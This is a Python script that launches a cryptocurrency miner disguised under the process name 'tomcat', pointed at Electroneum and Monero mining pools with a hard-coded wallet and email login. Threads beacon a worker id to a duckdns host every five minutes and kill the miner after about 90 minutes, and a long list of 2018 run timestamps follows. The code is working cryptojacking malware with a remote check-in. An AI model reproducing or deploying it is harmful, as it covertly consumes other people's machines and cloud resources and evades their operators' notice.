import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:19:01.738229
#2018-02-17 17:06:07.925771
#2018-02-17 18:54:06.952460
#2018-02-17 20:42:05.282430
#2018-02-17 22:29:03.956310
#2018-02-18 00:12:04.386596
#2018-02-18 02:04:04.257732
#2018-02-18 03:50:07.981809
#2018-02-18 05:38:02.181697
#2018-02-18 07:31:06.074760
#2018-02-18 09:19:06.165222
#2018-02-18 11:05:01.733139
#2018-02-18 12:51:07.787206
#2018-02-18 14:39:05.132284
#2018-02-18 16:28:07.233384
#2018-02-18 18:17:02.069145
#2018-02-18 20:02:03.748473
#2018-02-18 21:51:01.739060
#2018-02-18 23:40:06.470952
#2018-02-19 01:26:01.553109
#2018-02-19 03:14:05.112174
#2018-02-19 04:59:01.564626
#2018-02-19 06:42:06.982266
#2018-02-19 08:32:07.484111
#2018-02-19 10:21:02.187634
#2018-02-19 12:09:07.794680
#2018-02-19 13:56:07.705947
#2018-02-19 15:45:07.870918
#2018-02-19 17:34:01.388770
#2018-02-19 19:21:05.863049
#2018-02-19 21:09:01.771825
#2018-02-19 22:55:05.013758
#2018-02-20 00:41:04.808365
#2018-02-20 02:31:04.102863
#2018-02-20 04:21:01.276284
#2018-02-20 06:05:04.125226
#2018-02-20 07:50:07.604753
#2018-02-20 09:36:07.626284
#2018-02-20 11:21:05.800013
#2018-02-20 13:07:04.322040
#2018-02-20 14:52:10.295919
#2018-02-20 16:39:10.910412
#2018-02-20 18:26:04.444295
#2018-02-20 20:19:05.773016
#2018-02-20 22:04:01.648794
#2018-02-20 23:44:01.370205
#2018-02-21 01:33:01.644600
#2018-02-21 03:20:07.105746
#2018-02-21 05:09:01.457149
#2018-02-21 06:56:11.716503
#2018-02-21 08:43:03.907922
#2018-02-21 10:28:04.087572
#2018-02-21 12:16:01.891988
#2018-02-21 14:05:05.237490
#2018-02-21 15:51:07.706842
#2018-02-21 17:42:09.646527
#2018-02-21 19:29:04.727077
#2018-02-21 21:18:01.318594
#2018-02-21 23:04:01.461799
#2018-02-22 00:52:04.526163
#2018-02-22 02:39:05.514076
#2018-02-22 04:24:06.690262
#2018-02-22 06:09:05.422751
#2018-02-22 07:54:01.864210
#2018-02-22 09:42:09.684450
#2018-02-22 11:27:06.634458
#2018-02-22 13:12:02.239827
#2018-02-22 15:01:10.381909
#2018-02-22 16:45:14.298145
#2018-02-22 18:33:01.982442
#2018-02-22 20:24:06.875503
#2018-02-22 22:11:06.304205
#2018-02-22 23:56:09.347505
#2018-02-23 01:45:10.711211
#2018-02-23 03:35:07.780886
#2018-02-23 05:21:01.406944
#2018-02-23 07:06:05.529909
#2018-02-23 08:57:06.545198
#2018-02-23 11:16:01.266893
#2018-02-23 13:09:08.838571
#2018-02-23 14:55:02.774241
#2018-02-23 16:44:04.495861
#2018-02-23 18:31:06.421934
#2018-02-23 20:16:03.424818
#2018-02-23 22:06:02.138768
#2018-02-23 23:54:06.580929
#2018-02-24 01:43:07.499894
#2018-02-24 03:36:05.568889
#2018-02-24 05:21:06.752821
#2018-02-24 07:09:01.363416
#2018-02-24 08:56:05.767961
#2018-02-24 10:57:05.986891
#2018-02-24 12:47:06.854955
#2018-02-24 14:36:07.947239
#2018-02-24 16:23:05.176374
#2018-02-24 18:16:05.167804
#2018-02-24 20:02:05.251030
#2018-02-24 21:45:03.537749
#2018-02-25 00:42:04.900205
#2018-02-25 04:48:05.591362
#2018-02-25 09:13:01.683712